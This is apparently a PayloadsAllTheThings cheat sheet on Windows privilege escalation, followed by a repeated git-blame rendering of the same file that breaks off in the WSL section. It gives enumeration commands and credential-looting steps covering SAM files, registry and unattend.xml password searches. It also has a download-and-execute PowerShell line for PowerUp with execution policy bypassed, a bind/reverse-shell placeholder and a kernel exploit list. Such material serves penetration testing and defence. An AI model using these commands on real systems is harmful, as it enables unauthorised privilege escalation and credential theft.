PayloadsAllTheThings/Methodology and Resources/Windows - Privilege Escalat...

# Windows - Privilege Escalation

## Tools

- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)

## Windows Version and Configuration

```powershell
systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
wmic qfe
```

Architecture

```powershell
wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
```

List all env variables

```powershell
set
Get-ChildItem Env: | ft Key,Value
```

List all drives

```powershell
wmic logicaldisk get caption || fsutil fsinfo drives
wmic logicaldisk get caption,description,providername
Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
```

## User Enumeration

Get current username

```powershell
echo %USERNAME% || whoami
$env:username
```

List user privilege

```powershell
whoami /priv
```

List all users

```powershell
net user
net users
whoami /all
Get-LocalUser | ft Name,Enabled,LastLogon
Get-ChildItem C:\Users -Force | select Name
```

List logon requirements; useable for bruteforcing

```powershell$env:usernadsc
net accounts
```

Get details about a user (i.e. administrator, admin, current user)

```powershell
net user administrator
net user admin
net user %USERNAME%
```

List all local groups

```powershell
net localgroup
Get-LocalGroup | ft Name
```

Get details about a group (i.e. administrators)

```powershell
net localgroup administrators
Get-LocalGroupMember Administrators | ft Name, PrincipalSource
Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
```

## Network Enumeration

List all network interfaces, IP, and DNS.

```powershell
ipconfig /all
Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
Get-DnsClientServerAddress -AddressFamily IPv4 | ft
```

List current routing table

```powershell
route print
Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
```

List the ARP table

```powershell
arp -A
Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
```

List all current connections

```powershell
netstat -ano
```

List firware state and current configuration

```powershell
netsh advfirewall firewall dump
```

List all network shares

```powershell
net share
```

SNMP Configuration

```powershell
reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
```

## Looting for passwords

### SAM and SYSTEM files

```powershell
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%SYSTEMROOT%\System32\config\SAM
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\SYSTEM
%SYSTEMROOT%\System32\config\RegBack\system
```

### Search for file contents**

```powershell
cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
findstr /si password *.xml *.ini *.txt *.config
```

### Search for a file with a certain filename

```powershell
dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
```

### Search the registry for key names

```powershell
REG QUERY HKLM /F "password" /t REG_SZ /S /K
REG QUERY HKCU /F "password" /t REG_SZ /S /K
```

### Read a value of a certain sub key

```powershell
REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
```

### Passwords in unattend.xml

Location of the unattend.xml files

```powershell
C:\unattend.xml
C:\Windows\Panther\Unattend.xml
C:\Windows\Panther\Unattend\Unattend.xml
C:\Windows\system32\sysprep.inf
C:\Windows\system32\sysprep\sysprep.xml
```

Example content

```powershell
<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
    <AutoLogon>
     <Password>*SENSITIVE*DATA*DELETED*</Password>
     <Enabled>true</Enabled>
     <Username>Administrateur</Username>
    </AutoLogon>

    <UserAccounts>
     <LocalAccounts>
      <LocalAccount wcm:action="add">
       <Password>*SENSITIVE*DATA*DELETED*</Password>
       <Group>administrators;users</Group>
       <Name>Administrateur</Name>
      </LocalAccount>
     </LocalAccounts>
    </UserAccounts>
```

The Metasploit module `post/windows/gather/enum_unattend` looks for these files.

### IIS Web config

```powershell
Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
```

```powershell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
C:\inetpub\wwwroot\web.config
```

## Processes Enumeration and Tasks

What processes are running?

```powershell
tasklist /v
net start
sc query
Get-Service
Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
```

Which processes are running as "system"

```powershell
tasklist /v /fi "username eq system"
```

Do you have powershell magic?

```powershell
REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
```

List installed programs

```powershell
Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
```

Scheduled tasks

```powershell
schtasks /query /fo LIST 2>nul | findstr TaskName
Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
```

Startup tasks

```powershell
wmic startup get caption,command
reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
```


## Using PowerSploit's PowerUp

Spot the weak service using PowerSploit's PowerUp

```powershell
powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
```

## Using Windows Subsystem for Linux (WSL)

Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)

> With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.

```powershell
wsl whoami
./ubuntun1604.exe config --default-user root
wsl whoami
wsl python -c 'BIND_OR_REVERSE_SHELL_PYTHON_CODE'
```

## Unquoted Service Paths

The Microsoft Windows Unquoted Service Path Enumeration Vulnerability. All Windows services have a Path to its executable. If that path is unquoted and contains whitespace or other separators, then the service will attempt to access a resource in the parent path first.

```powershell
wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:windows\" |findstr /i /v """

gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike "C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name
```

## Kernel Exploit

List of exploits kernel : [https://github.com/SecWiki/windows-kernel-exploits](https://github.com/SecWiki/windows-kernel-exploits)

##### #Security Bulletin&nbsp;&nbsp;&nbsp;#KB &nbsp;&nbsp;&nbsp;&nbsp;#Description&nbsp;&nbsp;&nbsp;&nbsp;#Operating System  
- [MS17-017](./MS17-017) 　[KB4013081]　　[GDI Palette Objects Local Privilege Escalation]　　(windows 7/8)
- [CVE-2017-8464](./CVE-2017-8464) 　[LNK Remote Code Execution Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
- [CVE-2017-0213](./CVE-2017-0213) 　[Windows COM Elevation of Privilege Vulnerability]　　(windows 10/8.1/7/2016/2010/2008)
- [CVE-2018-0833](./CVE-2018-0833)   [SMBv3 Null Pointer Dereference Denial of Service]    (Windows 8.1/Server 2012 R2)
- [CVE-2018-8120](./CVE-2018-8120)   [Win32k Elevation of Privilege Vulnerability]    (Windows 7 SP1/2008 SP2,2008 R2 SP1)
- [MS17-010](./MS17-010) 　[KB4013389]　　[Windows Kernel Mode Drivers]　　(windows 7/2008/2003/XP)
- [MS16-135](./MS16-135) 　[KB3199135]　　[Windows Kernel Mode Drivers]　　(2016)
- [MS16-111](./MS16-111) 　[KB3186973]　　[kernel api]　　(Windows 10 10586 (32/64)/8.1)
- [MS16-098](./MS16-098) 　[KB3178466]　　[Kernel Driver]　　(Win 8.1)
- [MS16-075](./MS16-075) 　[KB3164038]　　[Hot Potato]　　(2003/2008/7/8/2012)
- [MS16-034](./MS16-034) 　[KB3143145]　　[Kernel Driver]　　(2008/7/8/10/2012)
- [MS16-032](./MS16-032) 　[KB3143141]　　[Secondary Logon Handle]　　(2008/7/8/10/2012)
- [MS16-016](./MS16-016) 　[KB3136041]　　[WebDAV]　　(2008/Vista/7)
- [MS16-014](./MS16-014) 　[K3134228]　　[remote code execution]　　(2008/Vista/7)    
...
- [MS03-026](./MS03-026) 　[KB823980]　　 [Buffer Overrun In RPC Interface]　　(/NT/2000/XP/2003)  


## References

* [The Open Source Windows Privilege Escalation Cheat Sheet by amAK.xyz and @xxByte](https://addaxsoft.com/wpecs/)
* [Basic Linux Privilege Escalation](https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/)
* [Windows Privilege Escalation Fundamentals](http://www.fuzzysecurity.com/tutorials/16.html)
* [TOP–10 ways to boost your privileges in Windows systems - hackmag](https://hackmag.com/security/elevating-privileges-to-administrative-and-further/)
* [The SYSTEM Challenge](https://decoder.cloud/2017/02/21/the-system-challenge/)
* [Windows Privilege Escalation Guide - absolomb's security blog](https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/)
* [Remediation for Microsoft Windows Unquoted Service Path Enumeration Vulnerability - September 18th, 2016 - Robert Russell](https://www.tecklyfe.com/remediation-microsoft-windows-unquoted-service-path-enumeration-vulnerability/)
* [Pentestlab.blog - WPE-01 - Stored Credentials](https://pentestlab.blog/2017/04/19/stored-credentials/)
* [Pentestlab.blog - WPE-02 - Windows Kernel](https://pentestlab.blog/2017/04/24/windows-kernel-exploits/)
* [Pentestlab.blog - WPE-03 - DLL Injection](https://pentestlab.blog/2017/04/04/dll-injection/)
* [Pentestlab.blog - WPE-04 - Weak Service Permissions](https://pentestlab.blog/2017/03/30/weak-service-permissions/)
* [Pentestlab.blog - WPE-05 - DLL Hijacking](https://pentestlab.blog/2017/03/27/dll-hijacking/)
* [Pentestlab.blog - WPE-06 - Hot Potato](https://pentestlab.blog/2017/04/13/hot-potato/)
* [Pentestlab.blog - WPE-07 - Group Policy Preferences](https://pentestlab.blog/2017/03/20/group-policy-preferences/)
* [Pentestlab.blog - WPE-08 - Unquoted Service Path](https://pentestlab.blog/2017/03/09/unquoted-service-path/)
* [Pentestlab.blog - WPE-09 - Always Install Elevated](https://pentestlab.blog/2017/02/28/always-install-elevated/) 
* [Pentestlab.blog - WPE-10 - Token Manipulation](https://pentestlab.blog/2017/04/03/token-manipulation/)
* [Pentestlab.blog - WPE-11 - Secondary Logon Handle](https://pentestlab.blog/2017/04/07/secondary-logon-handle/)
* [Pentestlab.blog - WPE-12 - Insecure Registry Permissions](https://pentestlab.blog/2017/03/31/insecure-registry-permissions/)
* [Pentestlab.blog - WPE-13 - Intel SYSRET](https://pentestlab.blog/2017/06/14/intel-sysret/)
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								# Windows - Privilege Escalation
-												Linux - PrivEsc - First draft

											
										
										
											2018-12-25 14:51:11 +00:00
+								## Tools
 								- [Watson - Watson is a (.NET 2.0 compliant) C# implementation of Sherlock](https://github.com/rasta-mouse/Watson)
 								- [(Deprecated) Sherlock - PowerShell script to quickly find missing software patches for local privilege escalation vulnerabilities](https://github.com/rasta-mouse/Sherlock)
 								- [BeRoot - Privilege Escalation Project - Windows / Linux / Mac](https://github.com/AlessandroZ/BeRoot)
 								- [Windows-Exploit-Suggester](https://github.com/GDSSecurity/Windows-Exploit-Suggester)
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								## Windows Version and Configuration
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								systeminfo | findstr /B /C:"OS Name" /C:"OS Version"
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								wmic qfe
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								Architecture
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE%
 								```
 								List all env variables
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								set
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-ChildItem Env: | ft Key,Value
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List all drives
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								wmic logicaldisk get caption || fsutil fsinfo drives
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								wmic logicaldisk get caption,description,providername
 								Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								## User Enumeration
 								Get current username
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								echo %USERNAME% || whoami
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								$env:username
 								```
 								List user privilege
 								```powershell
 								whoami /priv
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List all users
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								net user
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								net users
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								whoami /all
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-LocalUser | ft Name,Enabled,LastLogon
 								Get-ChildItem C:\Users -Force | select Name
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List logon requirements; useable for bruteforcing
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								```powershell$env:usernadsc
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								net accounts
 								```
 								Get details about a user (i.e. administrator, admin, current user)
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								net user administrator
 								net user admin
 								net user %USERNAME%
 								```
 								List all local groups
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								net localgroup
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-LocalGroup | ft Name
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								Get details about a group (i.e. administrators)
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								net localgroup administrators
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-LocalGroupMember Administrators | ft Name, PrincipalSource
 								Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								## Network Enumeration
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								List all network interfaces, IP, and DNS.
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								ipconfig /all
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address
 								Get-DnsClientServerAddress -AddressFamily IPv4 | ft
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List current routing table
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								route print
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List the ARP table
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								arp -A
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								List all current connections
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								netstat -ano
 								```
 								List firware state and current configuration
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								netsh advfirewall firewall dump
 								```
 								List all network shares
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								net share
 								```
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								SNMP Configuration
 								```powershell
 								reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s
 								Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse
 								```
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								## Looting for passwords
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								### SAM and SYSTEM files
 								```powershell
 								%SYSTEMROOT%\repair\SAM
 								%SYSTEMROOT%\System32\config\RegBack\SAM
 								%SYSTEMROOT%\System32\config\SAM
 								%SYSTEMROOT%\repair\system
 								%SYSTEMROOT%\System32\config\SYSTEM
 								%SYSTEMROOT%\System32\config\RegBack\system
 								```
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								### Search for file contents**
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								findstr /si password *.xml *.ini *.txt *.config
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								### Search for a file with a certain filename
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config*
 								```
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								### Search the registry for key names
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								REG QUERY HKLM /F "password" /t REG_SZ /S /K
 								REG QUERY HKCU /F "password" /t REG_SZ /S /K
 								```
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								### Read a value of a certain sub key
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList
 								```
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								### Passwords in unattend.xml
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
+								Location of the unattend.xml files
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												GPP decrypt + SSRF url for cloud providers

											
										
										
											2018-05-27 20:27:31 +00:00
+								```powershell
 								C:\unattend.xml
 								C:\Windows\Panther\Unattend.xml
 								C:\Windows\Panther\Unattend\Unattend.xml
 								C:\Windows\system32\sysprep.inf
 								C:\Windows\system32\sysprep\sysprep.xml
 								```
-												PassTheTicket + OpenShare + Tools(CME example)

											
										
										
											2018-07-08 18:03:40 +00:00
 								Example content
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												GPP decrypt + SSRF url for cloud providers

											
										
										
											2018-05-27 20:27:31 +00:00
+								```powershell
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
+								<component name="Microsoft-Windows-Shell-Setup" publicKeyToken="31bf3856ad364e35" language="neutral" versionScope="nonSxS" processorArchitecture="amd64">
-												GPP decrypt + SSRF url for cloud providers

											
										
										
											2018-05-27 20:27:31 +00:00
+								    <AutoLogon>
 								     <Password>*SENSITIVE*DATA*DELETED*</Password>
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
+								     <Enabled>true</Enabled>
 								     <Username>Administrateur</Username>
-												GPP decrypt + SSRF url for cloud providers

											
										
										
											2018-05-27 20:27:31 +00:00
+								    </AutoLogon>
 								    <UserAccounts>
 								     <LocalAccounts>
 								      <LocalAccount wcm:action="add">
 								       <Password>*SENSITIVE*DATA*DELETED*</Password>
 								       <Group>administrators;users</Group>
 								       <Name>Administrateur</Name>
 								      </LocalAccount>
 								     </LocalAccounts>
 								    </UserAccounts>
 								```
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												GPP decrypt + SSRF url for cloud providers

											
										
										
											2018-05-27 20:27:31 +00:00
+								The Metasploit module `post/windows/gather/enum_unattend` looks for these files.
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								### IIS Web config
 								```powershell
 								Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue
 								```
-												Linux - PrivEsc - First draft

											
										
										
											2018-12-25 14:51:11 +00:00
+								```powershell
 								C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config
 								C:\inetpub\wwwroot\web.config
 								```
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								## Processes Enumeration and Tasks
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								What processes are running?
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								tasklist /v
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								net start
 								sc query
 								Get-Service
 								Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
 								Which processes are running as "system"
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								tasklist /v /fi "username eq system"
 								```
 								Do you have powershell magic?
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
 								REG QUERY "HKLM\SOFTWARE\Microsoft\PowerShell\1\PowerShellEngine" /v PowerShellVersion
 								```
-												Windows Priv Esc - Unquoted Path, Password looting and Powershell version

											
										
										
											2018-12-25 14:19:45 +00:00
+								List installed programs
 								```powershell
 								Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime
 								Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name
 								```
 								Scheduled tasks
 								```powershell
 								schtasks /query /fo LIST 2>nul | findstr TaskName
 								Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State
 								```
 								Startup tasks
 								```powershell
 								wmic startup get caption,command
 								reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R
 								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
 								reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
 								dir "C:\Documents and Settings\All Users\Start Menu\Programs\Startup"
 								dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup"
 								```
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								## Using PowerSploit's PowerUp
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								Spot the weak service using PowerSploit's PowerUp
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								powershell -Version 2 -nop -exec bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellEmpire/PowerTools/master/PowerUp/PowerUp.ps1'); Invoke-AllChecks
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								## Using Windows Subsystem for Linux (WSL)
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								Technique borrowed from [Warlockobama's tweet](https://twitter.com/Warlockobama/status/1067890915753132032)
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								> With root privileges Windows  Subsystem for Linux (WSL)  allows users to create a bind shell on any port (no elevation needed). Don't know the root password? No problem just set the default user to root W/ <distro>.exe --default-user root. Now start your bind shell or reverse.
-												Markdown formatting update

											
										
										
											2018-08-12 21:30:22 +00:00
-												Windows PrivEsc + SQLi second order + AD DiskShadow

											
										
										
											2018-05-20 20:10:33 +00:00
+								```powershell
-												Architecture - Files/Intruder/Images and README + template

											
										
										
											2018-12-22 23:45:45 +00:00
+								wsl whoami
 								./ubuntun1604.exe config --default-user root
 								wsl whoami
